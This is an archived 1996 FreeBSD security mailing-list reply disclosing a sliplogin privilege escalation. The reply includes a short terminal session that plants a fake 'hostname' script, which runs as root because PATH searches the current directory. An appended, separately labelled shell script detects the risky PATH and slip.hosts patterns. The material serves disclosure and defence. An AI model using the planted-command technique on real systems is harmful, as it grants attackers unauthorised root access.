From owner-freebsd-security Mon Feb 12 02:36:28 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id CAA13474 for security-outgoing; Mon, 12 Feb 1996 02:36:28 -0800 (PST)
Received: from maelstrom.Berkeley.EDU (maelstrom-ether.Berkeley.EDU [128.32.184.248]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id CAA13469 for ; Mon, 12 Feb 1996 02:36:26 -0800 (PST)
Received: (from mconst@localhost) by maelstrom.Berkeley.EDU (8.6.12/8.6.12) id CAA23693; Mon, 12 Feb 1996 02:36:18 -0800
Date: Mon, 12 Feb 1996 02:36:18 -0800
From: Michael Constant
Message-Id: <199602121036.CAA23693@maelstrom.Berkeley.EDU>
To: mconst@csua.berkeley.edu, nate@sri.MT.net
Subject: Re: sliplogin hole?
Cc: freebsd-security@freebsd.org
Sender: owner-security@freebsd.org
Precedence: bulk

> > The sliplogin(8) manpage recommends using lines of the following form
> > in /etc/sliphome/slip.hosts:
> >
> >     Sfoo `hostname` foo netmask
> >
> > The problem with this is that the `hostname` portion is passed directly
> > to the shell, without any processing -- as root.  This means J. Random
> > Slip-User can create a script called ~/bin/hostname that does whatever
> > he wants, and (as long as ~/bin is before /bin in his path) his script
> > will be run as root the next time he types "sliplogin foo".
>
> Except that the path supplied to sliplogin is the standard unix
> path (PATH=:/bin:/usr/bin), which doesn't use anything from the user's
> home directory (unless it was explicitly set in the shell script).

Well, "PATH=:/bin:/usr/bin" contains the current directory ( . ) which is
just as insecure as not changing the path at all :-)  But thanks for
pointing out my misconception.  The exploit as I stated it does work; it's
written out in full below, in case I didn't explain it clearly in my
original letter.

> Also, if you are concerned about security, you don't allow your
> slip-login users to create/modify any of their slip files, which is easy
> to do as long as you don't give them the same uid's for both shell login
> and slip login accounts and use paranoid permissions on both accounts.

This will work, as long as the shell user is not allowed to run sliplogin.
Otherwise, the exploit stands:

    jrl@host% cd ~/bin
    jrl@host% cat > hostname
    #! /bin/sh
    touch /etc/i-am-root
    /bin/hostname
    ^D
    jrl@host% chmod 755 hostname
    jrl@host% sliplogin Sjrl
    starting slip login for Sjrl ...

and by this point, the deed is done.

- Michael Constant
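As an added example (not part of the original mail or of sliplogin itself), here are two administrator-side checks for the two conditions the thread turns on: a PATH whose empty component means the current directory, and a slip.hosts entry whose command substitution names a bare command that PATH resolves. The sample file and the PATH strings are constructed for the demonstration.

```sh
#!/bin/sh
# Added example, not from the original mail. sliplogin(8) hands slip.hosts
# lines to /bin/sh as root, so a bare `hostname` is looked up via PATH, and
# a PATH with an empty component (":/bin:/usr/bin") searches the current
# directory first. These checks flag both conditions.

# path_has_cwd PATH-STRING: succeed if any component is empty or ".", since
# either one makes the shell search the current directory.
path_has_cwd() {
    case ":$1:" in
        *::*|*:.:*) return 0 ;;
        *)          return 1 ;;
    esac
}

# count_path_lookups FILE: count non-comment lines whose command
# substitution (`cmd` or $(cmd)) starts with a bare name rather than an
# absolute path, i.e. a command that PATH decides. Prints the count.
count_path_lookups() {
    grep -v '^[[:space:]]*#' "$1" |
        grep -c -E '(^|[[:space:]])(`|\$\()[[:space:]]*[^/[:space:]`)]' || true
}

# write_sample FILE: a constructed slip.hosts-style file (not a real system
# file). Only the Sfoo line lets PATH decide what runs as root; Sbar uses
# an absolute path and Sbaz uses no command substitution at all.
write_sample() {
    cat > "$1" <<'EOF'
# constructed sample slip.hosts entries
Sfoo `hostname` foo 255.255.255.0
Sbar `/bin/hostname` bar 255.255.255.0
Sbaz 10.0.0.1 baz 255.255.255.0
EOF
}

sample=$(mktemp)
write_sample "$sample"
echo "entries resolved via PATH: $(count_path_lookups "$sample")"
if path_has_cwd ":/bin:/usr/bin"; then
    echo "PATH=:/bin:/usr/bin searches the current directory"
fi
rm -f "$sample"
```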